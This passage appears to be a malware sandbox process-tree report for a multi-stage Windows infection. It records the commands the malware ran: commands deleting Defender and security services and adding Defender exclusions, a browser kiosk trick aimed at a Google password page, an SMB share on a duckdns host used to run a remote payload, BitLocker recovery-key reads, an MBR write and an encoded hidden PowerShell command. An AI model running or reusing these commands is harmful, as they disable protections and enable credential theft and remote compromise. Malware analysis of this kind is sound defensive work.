        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:5384
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:3048
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:420
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:4288
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5496
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5416
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:4580
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:3944
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:1020
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:1868
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:1488
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:3268
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:2720
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:4348
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:8
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:6108
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:2404
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:2688
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:2344
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:5604
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:2100
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:3776
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:5464
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:4980
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:1332
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:1264
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:3500
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:3060
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:2512
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:924
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:5688
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:5744
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:4432
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:3784
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:2212
- - C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe
    "C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:848
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4852
- - C:\Users\Admin\AppData\Local\Temp\10450120101\934b30a571.exe
    "C:\Users\Admin\AppData\Local\Temp\10450120101\934b30a571.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3424
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10450120101\934b30a571.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2276
- - C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe
    "C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"
    3⤵
    - Executes dropped EXE
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\10450150101\5b6cca16d1.exe
    "C:\Users\Admin\AppData\Local\Temp\10450150101\5b6cca16d1.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5296
- - C:\Users\Admin\AppData\Local\Temp\10450160101\41ba928451.exe
    "C:\Users\Admin\AppData\Local\Temp\10450160101\41ba928451.exe"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    PID:4288
- - C:\Users\Admin\AppData\Local\Temp\10450170101\3d892e07dd.exe
    "C:\Users\Admin\AppData\Local\Temp\10450170101\3d892e07dd.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5320
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1124
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2120
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1524
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {4333f0c3-378f-4834-a602-15a5983e7b18} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:3956
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {73555fc2-dbee-4d85-8d5e-8bc1388ae65e} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:1368
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3656 -prefsLen 25164 -prefMapHandle 3660 -prefMapSize 270279 -jsInitHandle 3664 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3672 -initialChannelId {d55a1668-eb74-4cfc-bbde-475f9c4471f3} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:4520
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3824 -prefsLen 27276 -prefMapHandle 3828 -prefMapSize 270279 -ipcHandle 3896 -initialChannelId {879e6c64-7f26-41f3-a40a-f080d8fae005} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:5312
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4376 -prefsLen 34775 -prefMapHandle 4380 -prefMapSize 270279 -jsInitHandle 4384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4400 -initialChannelId {4e2ee4fc-cbdb-4d29-ae31-7a6fe70eabd4} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:5448
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4964 -prefsLen 35012 -prefMapHandle 4968 -prefMapSize 270279 -ipcHandle 4684 -initialChannelId {0d88650a-0287-4115-9722-d491597e04ae} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:5732
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5532 -prefMapSize 270279 -jsInitHandle 5544 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5436 -initialChannelId {1a18e310-2ca3-4029-af96-7d3cdc631032} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:5412
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5716 -prefsLen 32952 -prefMapHandle 5720 -prefMapSize 270279 -jsInitHandle 5724 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {10351e15-6fd1-43ae-be11-1bb48183cd3e} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:4288
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5904 -prefsLen 32952 -prefMapHandle 5908 -prefMapSize 270279 -jsInitHandle 5912 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5920 -initialChannelId {5f380d3d-9fba-49f5-88bd-0643ebda400e} -parentPid 1524 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1524" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:3616
- - C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe
    "C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
- - C:\Users\Admin\AppData\Local\Temp\10450200101\a2bd676b9e.exe
    "C:\Users\Admin\AppData\Local\Temp\10450200101\a2bd676b9e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6880
- - C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4748
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:5788
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6244
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6236
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6716
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6712
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6676
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6596
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6408
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6864
    - - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5920
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6800
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
      - C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5196
      - \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        6⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:6476
- - C:\Users\Admin\AppData\Local\Temp\10450230101\66a7aa70aa.exe
    "C:\Users\Admin\AppData\Local\Temp\10450230101\66a7aa70aa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6960
- - C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe
    "C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:3736
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:6340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4216
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:6344
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4328
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7792
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:11396
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:916
- - C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6248
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6220
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6228
- - C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe
    "C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe"
    3⤵
    - Executes dropped EXE
    PID:7652
- - C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:12732
- - C:\Users\Admin\AppData\Local\Temp\10450280101\qhjMWht.exe
    "C:\Users\Admin\AppData\Local\Temp\10450280101\qhjMWht.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6740
- - C:\Users\Admin\AppData\Local\Temp\10450290101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10450290101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:11352
- - C:\Users\Admin\AppData\Local\Temp\10450300101\caee2cc982.exe
    "C:\Users\Admin\AppData\Local\Temp\10450300101\caee2cc982.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:11552
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:11588
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:11484

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:3500
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:1004
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:5392
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:3032

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBtAFAAUABSAGUAZgBFAHIAZQBuAGMAZQAgAC0AZQB4AEMATAB1AFMAaQBvAE4AcABBAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAEMARQA7ACAAYQBEAGQALQBNAFAAcABSAEUAZgBlAFIAZQBOAGMAZQAgAC0ARQBYAGMAbABVAHMASQBPAG4AUABSAG8AYwBFAFMAUwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAGYAbwByAEMARQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:12864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:924

